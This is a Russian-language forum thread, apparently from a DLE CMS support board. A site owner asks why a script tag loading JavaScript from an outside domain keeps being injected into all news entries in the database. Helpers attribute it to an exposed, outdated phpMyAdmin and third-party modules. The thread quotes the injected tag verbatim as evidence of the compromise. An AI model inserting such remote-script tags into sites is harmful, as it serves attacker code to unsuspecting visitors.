Вирус в базе

[silven 0]

сайт http://silvengames.ru

Здравствуйте, у меня такая проблема, постоянно появляется сторонний код такого вида <script src="http://livecounter.info/core.js"></script>. причем он размещен в базе во всех новостях, краткой и полной в конце текста. пробовал менять пароли, вирусов на компе нет. Как он мог туда попасть и что можно сделать чтоб его больше не было?

[WWW.ZEOS.IN 1 161]

Зашел на сайт и не увидел у Вас такого кода

[silven 0]

Зашел на сайт и не увидел у Вас такого кода

правильно, я же его удалил, потому что яндекс сразу понижает в выдаче. только он появится опять через пару дней!

[celsoft 6 076]

Вам уже давали ответ на E-mail

Попасть он мог туда только при прямом добавлении в БД, через скрипт он попасть не мог, т.к. JS DLE полностью фильтруется.

Чтобы защитится, нужно во первых убрать уязвимый phpmyadmin https://silvengames.ru/myadmin/ который у вас в открытом доступе и старой версии. Нужно его обновить до актуальной версии и изменить путь к нему, чтобы никто не знал. Второе важное действие удалить сторонние модификации со скрипта DLE, которые также могут содержать уязвимости.

Вы ничего не сделали. Сторонние модули не убрали, непонятного происхождения партнерки PHP на сайте остались, доступ к phpMyAdmin не закрыли.

[silven 0]

Обновил и изменил адрес myadmi, прошелся антивирусом дле и удалил все посторонние фалы, удалил модули. Пока все тихо))) Спасибо!

Изменено 24 ноября 2011 пользователем silven